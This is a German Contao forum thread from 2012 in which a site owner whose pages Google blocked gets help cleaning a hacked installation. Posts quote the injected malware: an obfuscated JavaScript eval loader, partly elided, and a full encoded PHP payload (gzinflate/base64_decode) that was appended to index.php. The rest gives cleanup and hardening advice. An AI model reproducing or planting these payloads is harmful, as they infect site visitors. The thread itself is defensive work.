Ergebnis 1 bis 30 von 30

Thema: Google hat mir die WebSite gesperrt

  1. #1
    Contao-Nutzer Avatar von JeanetteS
    Registriert seit
    03.07.2011.
    Ort
    Würselen bei Aachen
    Beiträge
    18

    Standard Google hat mir die WebSite gesperrt

    Hallo Contaos,

    nun habe ich endlich zwei Webprojekte so gut wie fertig (meine Ersten Contao-Works) und bin damit schon ziemlich zufrieden.

    Dann kommt Google und legt mir Alles wieder lahm, weil mir unterstellt wird, Malware und Viren zu verbreiten.

    Nach Absprache mit meinem Webhoster (www.webhoster.de) habe ich alle Installationsordner komplett vom Server auf den PC
    heruntergeladen und mit AVIRA und MICROSOFT SECURITY ESSENTIALS überprüft: SAUBER!

    Dann habe ich nochmal den Contao-Check gemacht, der VOR der Programmierung zu 100% GRÜN war, nun zeigt er mir folgendes Bild:

    contao-check_27.03.12.JPG

    Mein Contao läuft in der aktuellen Version 2.11.2 auch mein FTP (File-Zilla) ist aktuell, Avira ist Tagesaktuell und M-Security Essentials sind auch Tagesaktuell.

    Google findet im Verzeichnis NICHT den implementierten Code, sodass ich Google nicht mal bitten kann, die Site wieder freizugeben.

    Ich bin ziemlich ratlos und frage auch hier, wie ich meine Verzeichnisse auf dem Server gegen Eindringlinge konsequent schützen kann.

    Ich danke Euch für einfach verständliche Lösungsvorschläge.

    LG Jeanette

    Die Webprojekte: www.dielichtformer.de (von Google gesperrt) und www.ferienhausbelgien.eu (wieder frei)

  2. #2
    Administratorin Avatar von lucina
    Registriert seit
    19.06.2009.
    Ort
    Kiel (DE)
    Beiträge
    7.376
    Partner-ID
    152
    User beschenken
    Wunschliste
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Ich bekomme da ebenfalls eine Warnung, die nicht gut ausschaut:lichtformer.PNG
    Passt das von Dir eingesetzte Checktool zur hochgeladenen Contao-Version?
    Sind die mit 'Corrupt' gekennzeichneten Dateien von Dir geändert worden?

    Carolina.

    (Meine Meinung zu Avira und MSSE ist, dass man da eigentlich auch Nimm2 lutschen kann.)

  3. #3
    Administrator Avatar von Nina
    Registriert seit
    04.06.2009.
    Ort
    Hamburg
    Beiträge
    4.756
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Wenn dir der Check zeigt, dass die Dateien "corrupt" sind, wurde vermutlich darin unerwünschter Code eingebracht. Hast du sie nochmal heruntergeladen und mal mit den frischen Install-Daten (einfach Contao-Paket von contao.org herunterladen) verglichen? Dann müsstest du ja schnell sehen können, welcher Code da hinzugefügt wurde.

  4. #4
    Contao-Urgestein
    Registriert seit
    07.04.2010.
    Ort
    Stuttgart
    Beiträge
    2.733
    User beschenken
    Wunschliste

    Standard

    Hallo,

    poste mal bitte den Inhalt der rot markierten Dateien (am besten als Gist oder so).
    Ersetze sie anschließend durch die Dateien aus einem neu heruntergaldenen orgina-Archiv von Contao (achte auf die richtige Version).

    Dann sollten die Dateien wieder stimmen. Ob es irgendwo ein Sicherheitsloch gab sehen wir dann je nach dem was sich für Code / ob sich Code in den Dateien versteckt, der dort nicht hingehört!

    //Edit: Wow, alle auf einmal, nur ich bin wieder mal zu lahm :-)

  5. #5
    Contao-Nutzer
    Registriert seit
    03.03.2011.
    Beiträge
    177

    Standard

    Schaut definitiv nach Code-Infektion aus.

  6. #6
    Contao-Nutzer Avatar von JeanetteS
    Registriert seit
    03.07.2011.
    Ort
    Würselen bei Aachen
    Beiträge
    18

    Standard

    Liebe Damen,

    es würde mir vermutlich mehr helfen, wenn man mir Alternativen zu den bemängelten Virenscannern aufzeigen würde, als sie nur zu bewerten. Danke!

    Auch die nächste Hilfe ist mir keine wirkliche Hilfe. Was soll ich Wo vergleichen? Ich bin Contao-Newbie und bin schon 56 (brauche aber noch keinen Krückstock,
    nur konkretere Hilfe) ;-)
    Danke!

    LG Jeanette

  7. #7
    Contao-Urgestein
    Registriert seit
    07.04.2010.
    Ort
    Stuttgart
    Beiträge
    2.733
    User beschenken
    Wunschliste

    Standard

    Ja, Seite ist kompromittiert!

    d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new"qwe".prototype}catch( qqq){zz='al';zz='v'+zz;ss="";if(1){f='f'+'r'+'o'+' m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n="3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5 ~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5 ~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~5
    [...]
    3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=587 ;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);
    Die Dateien die dir der Contao-Check als rot markiert solltest du mit orginal-Dateien vergleichen oder deren Quellcode posten, so dass man sich den anschauen kann.

  8. #8
    Contao-Nutzer
    Registriert seit
    03.03.2011.
    Beiträge
    177

    Standard

    Konkreter:

    In mehrere Dateien wurde Maleware-Code eingeschmuggelt.
    Das Problem ist übrigens noch bei beiden Seiten vorhanden!

    Beheben: Alle veränderten /rot markierten Dateien mit den originalen ersetzen.

    Das behebt natürlich noch nicht die Sicherheitslücke durch die das Problem entstanden ist.

  9. #9
    Contao-Fan
    Registriert seit
    27.06.2010.
    Beiträge
    539

    Standard

    Übrigens habe ich gerade die zweite Seite (FerienhausBelgien) aufgerufen; für einen kurzen Moment habe ich sie gesehen, dann kam ein Warnhinweis zu einer anderen URL. (Bei der anderen Seite kam die Meldung sofort.) Als würde eine "verseuchte" Seite eingebettet sein.


    Zusatz: Es wäre nicht schlecht, wenn du die Dateien nicht einfach ersetzt, sondern uns zusätzlich eine Kopie der "verseuchten", rot markierten, Dateien anhängst. Dann kann man sich den Code mal angucken.
    Angehängte Grafiken Angehängte Grafiken
    Geändert von tl_richard_user (27.03.2012 um 10:09 Uhr)

  10. #10
    Administratorin Avatar von lucina
    Registriert seit
    19.06.2009.
    Ort
    Kiel (DE)
    Beiträge
    7.376
    Partner-ID
    152
    User beschenken
    Wunschliste
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Zitat Zitat von JeanetteS Beitrag anzeigen
    Liebe Damen,
    es würde mir vermutlich mehr helfen, wenn man mir Alternativen zu den bemängelten Virenscannern aufzeigen würde, als sie nur zu bewerten. Danke!
    Es ging mir eher darum Dir deutlich zu machen dass Du denen nicht unbedingt trauen kannst. Sorry, wenn das für Dich nicht hilfreich war. Der Contao-Check ist maßgeblich.

    Zitat Zitat von JeanetteS Beitrag anzeigen
    Auch die nächste Hilfe ist mir keine wirkliche Hilfe. Was soll ich Wo vergleichen? Ich bin Contao-Newbie und bin schon 56 (brauche aber noch keinen Krückstock,
    nur konkretere Hilfe) ;-)
    Danke!

    LG Jeanette
    Du solltest die Daten des Contao auf Deinem Webspace mit den Daten vergleichen, die Du beim Download von Contao erhältst (von Contao.org bzw. dem Downloadlink auf Sourceforge, zu dem Du beim Download weitergeleitet wirst.

    Wobei dieser Vergleich aus meiner Sicht (und nach dem Posting des kompromittierten Quelltextes durch psren) jetzt obsolet ist.

    Für mich wäre jetzt folgendes angesagt:

    - Überprüfen deiner lokalen Daten (die Du dann ja irgendwann auf den Webspace geladen hast und die (hoffentlich) erst dort kompromittiert wurden . und die als Backup hoffentlich halbwegs aktuell sind
    - Wenn die in Ordnung sind: Löschen von allem auf dem Webserver (also das komplette Verzeichnis und die Datenbank)
    - Hochladen des lokalen, überprüften Backups

    Wenn Du kein aktuelles, sauberes Backup hast, wäre der Austausch der als 'corrupt' markierten Daten mit denen aus dem oben erwähnten Installationspaket von Hand der Weg, den Du gehen solltest. Ggf. können fiese Einträge allerdings auch in der Datenbank stecken (indem beispielsweise ein Modul mit verschleiertem Code enthalten ist, oder auch im Inhalt von tl_files [hier wäre es denkbar, Schadcode innerhalb einer Grafik oder eines PDF unterzubringen ...). Nicht schön, und dann kaum zu finden.

    Carolina.

    (im Übrigen auch fast 50 und im gegensatz zu Dir mit Krückstock ...)

  11. #11
    Contao-Nutzer Avatar von JeanetteS
    Registriert seit
    03.07.2011.
    Ort
    Würselen bei Aachen
    Beiträge
    18

    Standard Ich habe die index.php in Dreamweaver - Quelltext verglichen

    ... und dieser Code wurde mir ab Zeile 141 drangehängt:

    * Instantiate the controller
    */
    $objIndex = new Index();
    $objIndex->run();


    #215d25#
    echo(gzinflate(base64_decode("1VZLc5swEP4rLRcgjB1L IB5D1Et76blHjw/EhppMgm1Q6rE95rdXq5fxm2Z6aGdAMSvtft8+o6dmWpdL9mVGv 2UsT2e0ytefZo6bzulgmdVN/r1ijj1C2HYfSVoWzrqsZov1cLaYvr/lFXNZvdlxHWu1zq3hsl6wBdss8/00Y9O5s1qt3N12S+3s1U7h7y/b227TpqGWBcaQuyuoXdieXfN3wd83/n6d8yWr7bSgBf+CnRlfcjvd55TNy2ZcDJv354bVDkIuNzhJGbU 3fLuilj8kLbwEwTJqEWlR0gZJSwIuCGKQRrDAoSCBXwGXtBjz0 0YUtb4w4qvvk8MkBBSuAaIAtYGwCOp+rD6MBkdHsYBWFBKpJoR IGAAx5lBES0IwRZQnpx6R8BSCSwAFfuL4RDMELaQP+pK6JHYFp 1+sYokrSUUHV8MWJzeoIiIZwA6YwCYUBInI8ge84BiwCwvBikU ooYAD8BMUOBXJM9AwIIk0c2kAGQomTypu+kig0xZK4koozRFJT qdMIQurEKsIdg9+YF9m0xxGCgxpbOnpDQ3taNIpwU6gYmUrNCy 0xDf5ILIYBJYiKh6ZQ1klOmrGjnDFBBOOyaiA/fAQZJUOlXRpSzfKSLgWgztyI1JapCsVfvgjKJVOhi7VCz+Ewlu l3RUIdEk9iC/4g3o20eX2MyUi7IjJghPdXD1aJlAtI6RBN4Q3Z42eHzd6ykwSG aKRKNqwO8x0diPTs5DT6KR34+FJd8ryRP9Zg16KxFk74T/po6Mhdd5OMkw9EO93nEG633i9UY97szN2+pvodPFd/Y8U3flAPSq94wn5tyr9ymDuhfyh/5n/wv3CdJ94NCZX8nGnvgUxMA1z7urwtYbN8rVkjpW1lrmRuW5aLG qnpKO0/ExJHKWl57m7F1rCva9pvB+sLquf42LiDOYPDh4gDz1U45cJV9y LO+GKn4Lb4Xbr5o5leSs3fXpU99Tf")));
    #/215d25#
    ?>
    Wäre es richtig, wenn ich nun die betroffenen acht (rosa Zeilen aus dem Contao-Ceck) einfach wieder ersetze, damit dieser angehängte Code verschwindet?

    Dann interessiert mich noch, wie ich mich vor Neu-Infizierungen schützen kann...?

    Danke sehr für Eure kompetente Hilfe!
    Geändert von JeanetteS (27.03.2012 um 10:14 Uhr)

  12. #12
    Contao-Fan
    Registriert seit
    27.06.2010.
    Beiträge
    539

    Standard

    Zitat Zitat von JeanetteS Beitrag anzeigen
    Wäre es richtig, wenn ich nun die betroffenen acht (rosa Zeilen aus dem Contao-Ceck) einfach wieder ersetze, damit dieser angehängte Code verschwindet?
    Ja, denn in diesen Dateien steht nichts webseitspezifisches, also keine Artikel, die du im Backend verfasst hast.

  13. #13
    Administrator Avatar von Nina
    Registriert seit
    04.06.2009.
    Ort
    Hamburg
    Beiträge
    4.756
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Allerdings löst das dein Problem noch nicht, da die Seite immer wieder infiziert werden könnte (siehe auch Wiki-Eintrag). Lies dir mal den Contao-Wiki-Eintrag genau durch, dort findest du wichtige Tipps was du nun tun solltest.

  14. #14
    Contao-Nutzer Avatar von JeanetteS
    Registriert seit
    03.07.2011.
    Ort
    Würselen bei Aachen
    Beiträge
    18

    Standard Für Nina

    ... meinst Du das so, Nina?

    http://pastebin.de/24622

  15. #15
    Administrator Avatar von Nina
    Registriert seit
    04.06.2009.
    Ort
    Hamburg
    Beiträge
    4.756
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Ja, prima

  16. #16
    Administratorin Avatar von lucina
    Registriert seit
    19.06.2009.
    Ort
    Kiel (DE)
    Beiträge
    7.376
    Partner-ID
    152
    User beschenken
    Wunschliste
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Lade Dir ein sauberes Installationspaket der von Dir eingesetzten Version 2.11.2 herunter.

    Lösche die betreffenden Dateien (also alle, die im Contao-Check als ROT markiert wurden per FTP.

    Lade dieselben Dateien aus dem frischen Installationspaket per FTP hoch.

    Überprüfe das Ergebnis mittels Contao-Checktool.

    Dann schauen wir weiter - wobei ich mir vorstellen kann dass Du auf Deinen Rechner ein Problem hast ...

  17. #17
    Contao-Nutzer
    Registriert seit
    03.03.2011.
    Beiträge
    177

    Standard

    Zitat Zitat von JeanetteS Beitrag anzeigen
    ... meinst Du das so, Nina?

    http://pastebin.de/24622
    PHP-Code:
    #215d25#
    echo(gzinflate(base64_decode("1VZLc5swEP4rLRcgjB1LIB5D1Et76blHjw/EhppMgm1Q6rE95rdXq5fxm2Z6aGdAMSvtft8+o6dmWpdL9mVGv2UsT2e0ytefZo6bzulgmdVN/r1ijj1C2HYfSVoWzrqsZov1cLaYvr/lFXNZvdlxHWu1zq3hsl6wBdss8/00Y9O5s1qt3N12S+3s1U7h7y/b227TpqGWBcaQuyuoXdieXfN3wd83/n6d8yWr7bSgBf+CnRlfcjvd55TNy2ZcDJv354bVDkIuNzhJGbU3fLuilj8kLbwEwTJqEWlR0gZJSwIuCGKQRrDAoSCBXwGXtBjz00YUtb4w4qvvk8MkBBSuAaIAtYGwCOp+rD6MBkdHsYBWFBKpJoRIGAAx5lBES0IwRZQnpx6R8BSCSwAFfuL4RDMELaQP+pK6JHYFp1+sYokrSUUHV8MWJzeoIiIZwA6YwCYUBInI8ge84BiwCwvBikUooYAD8BMUOBXJM9AwIIk0c2kAGQomTypu+kig0xZK4koozRFJTqdMIQurEKsIdg9+YF9m0xxGCgxpbOnpDQ3taNIpwU6gYmUrNCy0xDf5ILIYBJYiKh6ZQ1klOmrGjnDFBBOOyaiA/fAQZJUOlXRpSzfKSLgWgztyI1JapCsVfvgjKJVOhi7VCz+Ewlul3RUIdEk9iC/4g3o20eX2MyUi7IjJghPdXD1aJlAtI6RBN4Q3Z42eHzd6ykwSGaKRKNqwO8x0diPTs5DT6KR34+FJd8ryRP9Zg16KxFk74T/po6Mhdd5OMkw9EO93nEG633i9UY97szN2+pvodPFd/Y8U3flAPSq94wn5tyr9ymDuhfyh/5n/wv3CdJ94NCZX8nGnvgUxMA1z7urwtYbN8rVkjpW1lrmRuW5aLGqnpKO0/ExJHKWl57m7F1rCva9pvB+sLquf42LiDOYPDh4gDz1U45cJV9yLO+GKn4Lb4Xbr5o5leSs3fXpU99Tf")));
    #/215d25# 
    Da ist der Übeltäter

  18. #18
    Contao-Nutzer Avatar von JeanetteS
    Registriert seit
    03.07.2011.
    Ort
    Würselen bei Aachen
    Beiträge
    18

    Standard D A N K E !!!

    So Ihr Lieben,

    heute habe ich wieder viel gelernt und inzwischen sind auf beiden Domains die jeweils rot markierten Dateien des Contao-Checks per FTP ersetzt worden, ebenso das PW für mein FTP. Ein neuer Check zeigte keine Mängel mehr. Die angehängten Scripte hatte ich - dank Nina - auch schon gesehen, deshalb bin ich Eurem Rat gefolgt und habe die verseuchten Dateien durch saubere Dateien ersetzt. Zum Glück hatte ich noch eine frische 2.11.2-Version separat gespeichert.

    Ihr habt mir sehr geholfen. D A N K E !!!

    Nun muß ich nur noch - irgendwie - Google davon überzeugen, die Seiten freizuschalten.
    UND ...
    ich muß irgendwie versuchen mein CONTAO gegen weitere Code-Anhängsel zu schützen... *seufz*

    Eine Webinfo sagte mir, dass sich diese Anhängsel selber, quasi automatisch, da anhängen, wo es möglich ist.

    You made my day!

  19. #19
    Contao-Urgestein
    Registriert seit
    07.04.2010.
    Ort
    Stuttgart
    Beiträge
    2.733
    User beschenken
    Wunschliste

    Standard

    Zur Sicherheit würde ich auch noch die Backend-Zugänge zu Contao und das Installtool Passwort ändern. Auch wenn das wohl nicht der Punkt war würde ich da lieber zu viel machen als zu wenig :-)

  20. #20
    Administratorin Avatar von lucina
    Registriert seit
    19.06.2009.
    Ort
    Kiel (DE)
    Beiträge
    7.376
    Partner-ID
    152
    User beschenken
    Wunschliste
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Erstmal solltest Du versuchen, herauszubekommen, wie das Script auf Deinen Webspace gekommen ist.

    - Was sagt Dein Webhoster dazu?
    - Gibt es Logfiles, aus denen hervorgeht, wann dieser Code zum ersten mal zu tragen kam (z.B. Logs über weitergeleitete Seitenaufrufe)?
    - Ist Dein eigener Rechner sauber? Verwendest Du dort die jeweils aktuelle Version?
    - Was sagen alternative AV-Tools über Deinen Rechner? Es gibt von Kaspersky eine Trial unter www.kaspersky.com/de/trials, und der in letzter Zeit auch annehmbar bewertete Norton bietet das auch (http://de.norton.com/downloads-trial-norton-antivirus)
    - Bleibt Deine Seite sauber, wenn Du sie heute mittag, heute Abend, morgen mit dem Checktool überprüfst?
    - Liegen in Deinem Webspace ausser Contao noch andere Anwendungen?
    - Sind Anwendungen anderer User, die auf dem selben Server liegen, ggf. ebenfalls betroffen?

    Carolina.

  21. #21
    Contao-Nutzer
    Registriert seit
    03.03.2011.
    Beiträge
    177

    Standard

    Ich hatte übrigens in diesem Jahr auch schon 2 solche Infektionen bei Kunden mit unterschiedlichen Ursachen.

    In einem Fall betrieb der Kunde parallel einen Wordpress-Blog mit Sicherheitslücken.

    Im 2.Fall hatte ich die Webseite mit einem Kollege zusammen erstellt.
    Es hat sich dann rausgestellt, das er auf seinem Rechner einen Trojaner hatte und die FTP-Zugangsdaten dadurch ausgespäht wurden.

  22. #22
    Contao-Fan
    Registriert seit
    27.06.2010.
    Beiträge
    539

    Standard

    Da könnte man doch leo glatt den Vorschlag machen, dass der Contao-Check direkt ins CMS integriert wird ((und eine Warnung im Backend erscheint, sobald eine Änderung bemerkt wurde)).

  23. #23
    Contao-Urgestein
    Registriert seit
    07.04.2010.
    Ort
    Stuttgart
    Beiträge
    2.733
    User beschenken
    Wunschliste

    Standard

    Zitat Zitat von tl_richard_user Beitrag anzeigen
    Da könnte man doch leo glatt den Vorschlag machen, dass der Contao-Check direkt ins CMS integriert wird ((und eine Warnung im Backend erscheint, sobald eine Änderung bemerkt wurde)).
    Das ergibt wenig Sinn, da des öfteren auch Dateien absichtlich verändert werden.

  24. #24
    Contao-Urgestein
    Registriert seit
    10.07.2010.
    Beiträge
    4.403
    User beschenken
    Wunschliste

    Standard

    Zitat Zitat von JeanetteS
    Nun muß ich nur noch - irgendwie - Google davon überzeugen, die Seiten freizuschalten.
    UND ...
    ich muß irgendwie versuchen mein CONTAO gegen weitere Code-Anhängsel zu schützen... *seufz*

    Zitat Zitat von Google Chrome; Safe Browsing, ganz unten:
    Nächste Schritte:

    Es sieht fast so aus, dass Du Dir die Malaware von www(dot)just-tina(dot)de eingefangen hast.
    Entferne mal den Link auf Deiner Startseite und füge den Link erst wieder ein, wenn auch diese Seite gereinigt und nicht mehr geblockt wird!

    ciaobello

    Edit: 15:35 Ortszeit, mit dem Firefox komm ich auch wieder auf die Seite dielichtformer.de ohne Hinweis (von Brasilien)
    www(dot)just-tina(dot)de resp. justnow(dot)com(dot)au Zeigt es nun auch an aber es kommt noch ein Hinweis!
    Geändert von ciaobello (27.03.2012 um 15:40 Uhr)


  25. #25
    Contao-Fan Avatar von Fulano
    Registriert seit
    14.09.2010.
    Beiträge
    467
    Partner-ID
    7000

    Standard

    Hallo,

    Zitat Zitat von JeanetteS Beitrag anzeigen
    ... ebenso das PW für mein FTP. .
    dein FTP-Programm könnte auch eine Sicherheitslücke darstellen. Siehe dazu auch diesen Link.

    Gruß, Fulano

  26. #26
    Wandelndes Contao-Lexikon Avatar von BugBuster
    Registriert seit
    15.06.2009.
    Ort
    Berlin
    Beiträge
    10.553
    User beschenken
    Wunschliste

    Standard

    Zitat Zitat von tl_richard_user Beitrag anzeigen
    Da könnte man doch leo glatt den Vorschlag machen, dass der Contao-Check direkt ins CMS integriert wird ((und eine Warnung im Backend erscheint, sobald eine Änderung bemerkt wurde)).
    So etwas ähnliches schwebt mir schon einige Zeit im Kopf rum, aber als BE Modul welches per Hand oder auch per Contao-Cron aufgerufen werden kann (daily).
    Untersuchung bestimmter Files (nicht aller) per Checksumme, diese kann auch selber generiert werden (nach Update, Handänderungen etc.), erstmalig per runonce automatisch.

    Nach "bösen" Code Schnippseln hatte ich auch schon überlegt, aber Befehle wie gzinflate oder base64_decode kommen auch in Contao selbst vor, wenn auch nur in bestimmten Dateien.(bisher)
    Grüße, BugBuster
    "view source" is your guide.
    Danke an alle Amazon Wunschlisten Erfüller

  27. #27
    Maintainer Avatar von xtra
    Registriert seit
    02.07.2009.
    Ort
    Tuebingen
    Beiträge
    2.007
    User beschenken
    Wunschliste

    Standard

    Die Idee zu einem Tripwire4Contao hatte ich auch schon, die Frage ist jedoch, wie genau man da die Regeln setzen soll, da wie du bereits sagtest, die Befehle nicht allgemein geblockt werden sollten/koennen.

    Wenn der core sie nicht verwendet, so manche Erweiterung tut dies definitiv.
    Bedenke stets: Wenn Du ungenaue oder unzureichende Angaben machst, so koennte dies die Bearbeitung deiner Frage endlos verzoegern (oder sogar dazu fyhren, dass ich zu viel nachdenken muss und die Antwort vergesse!). Kein Support per PN.

  28. #28
    Contao-Urgestein Avatar von Thomas
    Registriert seit
    16.08.2009.
    Ort
    Visselhövede
    Beiträge
    1.947
    User beschenken
    Wunschliste

    Standard

    Ich fasse mal ganz kurz zusammen, was man in so einem Fall unternimmt, damit Du einen kleinen roten Faden bekommst!

    1. Zugangsdaten ändern und zwar alle, sowohl die vom Webspace, als auch die von Contao,Datenbanken usw., bei eigenen Servern auch ROOT-Passwörter, User etc.
    2. Seite(n) vom Netz nehmen und Dateien kontrollieren (Contao-Check, Prüfsummen, Dateigrößen)
    3. Log-Dateien auswerten, es werden bei aktivierten Logs immer Spuren hinterlassen. Wenn man das nicht selber kann, Hilfe organisieren oder Anbieter behelligen
    4. nicht einfach mit Standardaussagen des Anbieters abspeisen lassen, die sollten ein erhebliches Interesse daran haben, ihre Server sauber zu halten, somit auch den Willen, die Übeltäter zu finden
    5. Anzeige gegen Unbekannt, hilft zwar nicht beim Finden der Lücke, aber es wird bekannt und beschäftigt auch andere damit, es könnte ja mal sein, dass der böse Bube ausfindig gemacht wird

    Bedenke:
    Es muss nicht zwingend an Deiner Installation liegen! Vor allem nicht dann, wenn man sich den Server mit vielen anderen Seiten teilen muss. Hier kann auch bei Kunde XYZ eine Installation vorliegen, die dem bösen Buben Tür und Tor öffnet. Du als Ahnungsloser, Sicherheits denkender Anwender bist dann *mit gehangen, mit gefangen*.
    So etwas macht immer viel Arbeit.

    Wie erwähnt würde ich in jedem Fall die Seite erst mal vom Netz nehmen. Denn auch Du kannst mächtig Ärger bekommen, sollte sich die Verbreitung über Deine Seite heraus stellen.
    Erst die Seite wieder Online nehmen, wenn die Sachverhalte geklärt sind und das System sauber ist.

    Entwicklung immer in sicheren Umgebungen erstellen, z.B. Passwort gesichert.
    Die Meisten nehmen dafür XAMPP oder Contao2Go und installieren sich das Lokal. Erst wenn die Seite spruchreif ist, geht man damit Online.
    Gruß Thomas
    "Zuerst ignorieren sie dich, dann lachen sie über dich, dann bekämpfen sie dich und dann gewinnst du." Mahatma Gandhi

  29. #29
    Contao-Nutzer
    Registriert seit
    18.11.2011.
    Beiträge
    5

    Standard

    Zur Malewarebeseitigung.

    1. Stelle sicher das alle Rechner die einen FTP Account zum System haben frei von jeglicher Art Maleware sind. (Prüf mal mit animalware, normale Virenscanner sind da manchmal Blind).
    2. FTP und E-Mailpasswörter ändern.
    3. Datenbankdump ziehen
    4. Datenbank auf kompromitation prüfen (JS Code besonders beachten).
    5. altes Template Backup
    6. Template auf evt. JS Code prüfen.
    7. Shop neu hochladen
    8. Template hochladen
    9. Homepage prüfen.
    10. Google Webmastertools anmelden
    11. Neuprüfung beantragen
    12. Nach der Freischaltung freuen.

    Du kannst das entweder selbst machen oder es an einen Dienstleister auslagern. Wir haben da einen Spezi [Kontaktdaten entfernt. Weiß der Herr, dass Du seine Kontaktdaten in einem öffentlichen Forum postest?] Bei uns haben die das für einen Stundenlohn von 200€ innerhalb von 1 Stunde erledigt.
    Geändert von lucina (28.03.2012 um 11:01 Uhr)

  30. #30
    Contao-Nutzer
    Registriert seit
    18.11.2011.
    Beiträge
    5

    Standard

    Danke für das Beschneiden des Beitrages, ich werde einmal anfragen ob man unseren Dienstleister so offizell nennen darf.

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •